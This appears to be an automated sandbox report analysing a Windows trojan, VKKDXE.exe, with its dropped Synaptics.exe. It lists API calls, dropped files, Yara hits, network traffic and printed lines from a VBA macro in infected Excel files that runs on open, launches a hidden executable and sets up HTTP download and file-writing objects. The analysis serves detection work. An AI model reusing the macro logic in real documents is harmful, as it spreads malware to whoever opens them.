Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.7:49909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.7:49919 version: TLS 1.2

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D97099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

3_2_00D97099

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D97294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00D97294
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E17294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		15_2_00E17294

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

3_2_00D97099

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D84342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

3_2_00D84342

System Summary

Document contains an embedded VBA macro with suspicious strings

Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: vLLZ7oOw.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: UNKRLCVOHV.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: vLLZ7oOw.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: UNKRLCVOHV.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: vLLZ7oOw.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: UNKRLCVOHV.xlsm.6.dr	Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D429C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	3_2_00D429C2
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DB02AA NtdllDialogWndProc_W,	3_2_00DB02AA
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAE769 NtdllDialogWndProc_W,CallWindowProcW,	3_2_00DAE769
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	3_2_00DAEAA6
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAEA4E NtdllDialogWndProc_W,	3_2_00DAEA4E
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5AC99 NtdllDialogWndProc_W,	3_2_00D5AC99
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	3_2_00DAECBC
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,	3_2_00D5AD5C
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5AFB4 GetParent,NtdllDialogWndProc_W,	3_2_00D5AFB4
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	3_2_00DAEFA8
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF0A1 SendMessageW,NtdllDialogWndProc_W,	3_2_00DAF0A1
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	3_2_00DAF122
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF3DA NtdllDialogWndProc_W,	3_2_00DAF3DA
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF3AB NtdllDialogWndProc_W,	3_2_00DAF3AB
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF37C NtdllDialogWndProc_W,	3_2_00DAF37C
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF45A ClientToScreen,NtdllDialogWndProc_W,	3_2_00DAF45A
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF425 NtdllDialogWndProc_W,	3_2_00DAF425
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAF594 GetWindowLongW,NtdllDialogWndProc_W,	3_2_00DAF594
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5B7F2 NtdllDialogWndProc_W,	3_2_00D5B7F2
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5B845 NtdllDialogWndProc_W,	3_2_00D5B845
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAFE80 NtdllDialogWndProc_W,	3_2_00DAFE80
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAFE7D NtdllDialogWndProc_W,	3_2_00DAFE7D
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	3_2_00DAFF91
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	3_2_00DAFF04
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	15_2_00DC29C2
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E302AA NtdllDialogWndProc_W,	15_2_00E302AA
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2E769 NtdllDialogWndProc_W,CallWindowProcW,	15_2_00E2E769
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	15_2_00E2EAA6
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2EA4E NtdllDialogWndProc_W,	15_2_00E2EA4E
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDAC99 NtdllDialogWndProc_W,	15_2_00DDAC99
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	15_2_00E2ECBC
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDAD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,	15_2_00DDAD5C
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	15_2_00E2EFA8
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDAFB4 GetParent,NtdllDialogWndProc_W,	15_2_00DDAFB4
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F0A1 SendMessageW,NtdllDialogWndProc_W,	15_2_00E2F0A1
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	15_2_00E2F122
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F3DA NtdllDialogWndProc_W,	15_2_00E2F3DA
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F3AB NtdllDialogWndProc_W,	15_2_00E2F3AB
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F37C NtdllDialogWndProc_W,	15_2_00E2F37C
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F45A ClientToScreen,NtdllDialogWndProc_W,	15_2_00E2F45A
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F425 NtdllDialogWndProc_W,	15_2_00E2F425
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2F594 GetWindowLongW,NtdllDialogWndProc_W,	15_2_00E2F594
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDB7F2 NtdllDialogWndProc_W,	15_2_00DDB7F2
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDB845 NtdllDialogWndProc_W,	15_2_00DDB845
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2FE80 NtdllDialogWndProc_W,	15_2_00E2FE80
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2FE7D NtdllDialogWndProc_W,	15_2_00E2FE7D
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	15_2_00E2FF91
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,	15_2_00E2FF04

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D870AE: CreateFileW,DeviceIoControl,CloseHandle,

3_2_00D870AE

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D7B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,75035590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

3_2_00D7B9F1

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D882D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		3_2_00D882D0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E082D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		15_2_00E082D0

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DA30AD	3_2_00DA30AD
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D53680	3_2_00D53680
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D4DCD0	3_2_00D4DCD0
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D4A0C0	3_2_00D4A0C0
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D60183	3_2_00D60183
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8220C	3_2_00D8220C
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D48530	3_2_00D48530
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D60677	3_2_00D60677
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D46670	3_2_00D46670
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D78779	3_2_00D78779
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00DAA8DC	3_2_00DAA8DC
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D60A8F	3_2_00D60A8F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D46BBC	3_2_00D46BBC
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D6AC83	3_2_00D6AC83
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D48CA0	3_2_00D48CA0
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D5AD5C	3_2_00D5AD5C
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D60EC4	3_2_00D60EC4
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D74EBF	3_2_00D74EBF
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D7113E	3_2_00D7113E
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D612F9	3_2_00D612F9
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D7542F	3_2_00D7542F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D7599F	3_2_00D7599F
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D6DA74	3_2_00D6DA74
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D6BDF6	3_2_00D6BDF6
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D4BDF0	3_2_00D4BDF0
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D45D32	3_2_00D45D32
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D61E5A	3_2_00D61E5A
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D77FFD	3_2_00D77FFD
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D8BFB8	3_2_00D8BFB8
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D6DF69	3_2_00D6DF69
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DCDCD0	15_2_00DCDCD0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DCA0C0	15_2_00DCA0C0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE0183	15_2_00DE0183
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0220C	15_2_00E0220C
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC8530	15_2_00DC8530
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE0677	15_2_00DE0677
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC6670	15_2_00DC6670
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF8779	15_2_00DF8779
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E2A8DC	15_2_00E2A8DC
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE0A8F	15_2_00DE0A8F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC6BBC	15_2_00DC6BBC
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DEAC83	15_2_00DEAC83
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC8CA0	15_2_00DC8CA0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DDAD5C	15_2_00DDAD5C
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE0EC4	15_2_00DE0EC4
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF4EBF	15_2_00DF4EBF
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E230AD	15_2_00E230AD
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF113E	15_2_00DF113E
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE12F9	15_2_00DE12F9
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF542F	15_2_00DF542F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DD3680	15_2_00DD3680
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF599F	15_2_00DF599F
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DEDA74	15_2_00DEDA74
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DEBDF6	15_2_00DEBDF6
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DCBDF0	15_2_00DCBDF0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DC5D32	15_2_00DC5D32
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DE1E5A	15_2_00DE1E5A
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DF7FFD	15_2_00DF7FFD
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00E0BFB8	15_2_00E0BFB8
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DEDF69	15_2_00DEDF69

Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: vLLZ7oOw.xlsm.6.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Private Sub Workbook_Open()
Source: UNKRLCVOHV.xlsm.6.dr	OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: String function: 00D67750 appears 42 times
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: String function: 00D5F885 appears 68 times
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: String function: 00DE7750 appears 42 times
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: String function: 00DDF885 appears 68 times

Source: C:\ProgramData\Synaptics\Synaptics.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7492 -s 6408

Source: VKKDXE.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: VKKDXE.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Source: Synaptics.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCX458E.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: VKKDXE.exe, 00000000.00000000.1260523076.000000000050F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameb! vs VKKDXE.exe
Source: VKKDXE.exe, 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs VKKDXE.exe
Source: VKKDXE.exe, 00000000.00000002.1270244300.0000000000889000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameVh= vs VKKDXE.exe
Source: VKKDXE.exe, 00000000.00000003.1269288934.0000000002370000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs VKKDXE.exe
Source: VKKDXE.exe, 00000000.00000003.1269379712.0000000000869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs VKKDXE.exe
Source: VKKDXE.exe, 00000000.00000003.1269379712.0000000000869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameVh= vs VKKDXE.exe
Source: VKKDXE.exe	Binary or memory string: OriginalFileName vs VKKDXE.exe
Source: VKKDXE.exe	Binary or memory string: OriginalFilenameb! vs VKKDXE.exe

Source: VKKDXE.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@24/44@7/4

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D8D712 GetLastError,FormatMessageW,

3_2_00D8D712

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D7B8B0 AdjustTokenPrivileges,CloseHandle,	3_2_00D7B8B0
Source: C:\Users\user\Desktop\._cache_VKKDXE.exe	Code function: 3_2_00D7BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_00D7BEC3
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DFB8B0 AdjustTokenPrivileges,CloseHandle,	15_2_00DFB8B0
Source: C:\Users\user\AppData\Roaming\Windata\ZTCKPI.exe	Code function: 15_2_00DFBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	15_2_00DFBEC3

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D8EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

3_2_00D8EA85

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D86F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

3_2_00D86F5B

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D8EFCD CoInitialize,CoCreateInstance,CoUninitialize,

3_2_00D8EFCD

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Code function: 3_2_00D431F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

3_2_00D431F2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Users\user\Desktop\VKKDXE.exe

File created: C:\Users\user\Desktop\._cache_VKKDXE.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7492
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

File created: C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs

Jump to behavior

Source: Yara match	File source: VKKDXE.exe, type: SAMPLE
Source: Yara match	File source: 0.0.VKKDXE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1260396228.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX458E.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_VKKDXE.exe

Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\CXNFQD.vbs

Source: C:\Users\user\Desktop\VKKDXE.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
